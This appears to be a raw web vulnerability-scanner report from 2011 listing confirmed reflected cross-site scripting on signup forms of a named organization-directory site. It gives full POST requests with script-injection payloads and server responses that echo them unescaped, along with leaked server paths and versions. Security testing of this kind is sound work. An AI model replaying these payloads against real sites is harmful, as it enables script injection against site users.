FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=\'><script>netsparker(9)</script>></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red><b>*USER ID !!</b></font></td><td align=left valign=top><input type="text" name="user" size=15 value=3><br><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST '"--></style></script><script>alert(0x002A3E)</script>
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my Directory Listing!
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 324
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A3E)%3c%2fscript%3e&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+Directory+Listing!&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:48:13 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b><font color=red>Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red><b>*EMAIL ADDRESS !!</b></font></td><td align=left valign=top><input type="text" name="email" size=25 value=\'\"--></style></script><script>netsparker(0x002A3E)</script>><br><font color=red><b> *Please enter a valid EMAIL address !</td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red><b>*USER ID !!</b></font></td><td align=left valign=top><input type="text" name="user" size=15 value=3><br><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST '"--></style></script><script>alert(0x002A8B)</script>
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A8B)%3c%2fscript%3e&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:52:19 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="\'\"--></style></script><script>netsparker(0x002A8B)</script>"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, 